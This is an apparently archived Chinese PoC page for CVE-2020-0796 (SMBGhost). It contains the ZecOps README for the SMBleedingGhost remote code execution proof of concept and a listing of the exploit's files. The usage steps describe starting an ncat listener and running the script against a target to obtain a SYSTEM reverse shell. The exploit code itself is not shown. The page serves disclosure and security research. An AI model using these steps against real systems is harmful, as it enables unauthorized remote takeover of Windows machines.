关联漏洞
标题:微软 Microsoft SMBv3 缓冲区错误漏洞 (CVE-2020-0796)Description:Microsoft SMBv3是美国微软(Microsoft)公司的一个为设备提供SMB功能的支持固件。 Microsoft Server Message Block 3.1.1 (SMBv3)版本中存在缓冲区错误漏洞,该漏洞源于SMBv3协议在处理恶意压缩数据包时,进入了错误流程。远程未经身份验证的攻击者可利用该漏洞在应用程序中执行任意代码。以下产品及版本受到影响:Microsoft Windows 10版本1903,Windows Server版本1903,Windows 10版本1909,Windo
Description
CVE-2020-0796 Remote Code Execution POC
介绍
# CVE-2020-0796 Remote Code Execution POC
(c) 2020 ZecOps, Inc. - https://www.zecops.com - Find Attackers' Mistakes
Remote Code Execution POC for CVE-2020-0796 / "SMBGhost"
Expected outcome: Reverse shell with system access.
Intended only for educational and testing in corporate environments.
ZecOps takes no responsibility for the code, use at your own risk.
Please contact sales@ZecOps.com if you are interested in agent-less DFIR tools for Servers, Endpoints, and Mobile Devices to detect SMBGhost and other types of attacks automatically.
## Usage
* Make sure **Python** and **ncat** are installed.
* Run `calc_target_offsets.bat` on the target computer, and adjust the offsets at the top of the `SMBleedingGhost.py` file according to the script output (also see the note below).
* Run **ncat** with the following command line arguments:
`ncat -lvp <port>`
Where `<port>` is the port number **ncat** will be listening on.
* Run `SMBleedingGhost.py` with the following command line arguments:
`SMBleedingGhost.py <target_ip> <reverse_shell_ip> <reverse_shell_port>`
Where `<target_ip>` is the IP address of the target, vulnerable computer. `<reverse_shell_ip>` and `<reverse_shell_port>` are the IP address and the port number **ncat** is listening on.
* If all goes well, **ncat** will display a shell that provides system access to the target computer.
**Note:** You might be wondering why it's necessary to run the `calc_target_offsets.bat` script on the target computer, and doesn't it defeat the whole point of the remote code execution being remote. These offsets are not random, and are the same on all Windows instances of the same Windows version. One could make the attack more universal by detecting the target Windows version and adjusting the offsets automatically, or by not relying on them altogether, but it's only a POC and we did what was simpler. We also see it as a good thing that the POC is not universal, and is not convenient for uses other than testing and education.
## Target Environment
Windows 10 Versions 1903 and 1909 are affected. Unpatched Windows 10 1903 versions aren't supported due to a null dereference bug in Windows (fixed in KB4512941).
Due to the nature of the exploitation, the POC works best for targets running on a computer (or a VM) with a single logical processor. Targets with more than one logical processor running in VirtualBox should be supported as well, but the POC is less reliable in this case. Other targets might not be supported. For details, refer to our technical writeup below.
## Technical Writeup
* [SMBleedingGhost Writeup Part I: Chaining SMBleed (CVE-2020-1206) with SMBGhost](https://blog.zecops.com/vulnerabilities/smbleedingghost-writeup-chaining-smbleed-cve-2020-1206-with-smbghost/)
* [SMBleedingGhost Writeup Part II: Unauthenticated Memory Read – Preparing the Ground for an RCE](https://blog.zecops.com/vulnerabilities/smbleedingghost-writeup-part-ii-unauthenticated-memory-read-preparing-the-ground-for-an-rce/)
* [SMBleedingGhost Writeup Part III: From Remote Read (SMBleed) to RCE](https://blog.zecops.com/vulnerabilities/smbleedingghost-writeup-part-iii-from-remote-read-smbleed-to-rce/)
## References
* [Vulnerability Reproduction: CVE-2020-0796 POC - ZecOps Blog](https://blog.zecops.com/vulnerabilities/vulnerability-reproduction-cve-2020-0796-poc/)
* [CVE-2020-0796 - Microsoft Security Response Center](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796)
* [CVE-2020-1206 - Microsoft Security Response Center](https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-1206)
文件快照
[4.0K] /data/pocs/0a3d2983deb0c6838f299f8305647ce8bf0e138a
├── [1.7K] calc_target_offsets.bat
├── [342K] demo.gif
├── [3.6K] README.md
├── [ 18K] smbghost_kshellcode_x64.asm
├── [ 43K] SMBleedingGhost.py
└── [4.0K] tools
├── [149K] cdb.exe
├── [1.8M] dbghelp.dll
├── [ 22K] dumpbin.exe
├── [1.6M] link.exe
├── [576K] msvcp140.dll
├── [244K] symsrv.dll
├── [255K] tbbmalloc.dll
├── [ 43K] vcruntime140_1.dll
└── [ 98K] vcruntime140.dll
1 directory, 14 files
备注
1. 建议优先通过来源进行访问。
2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →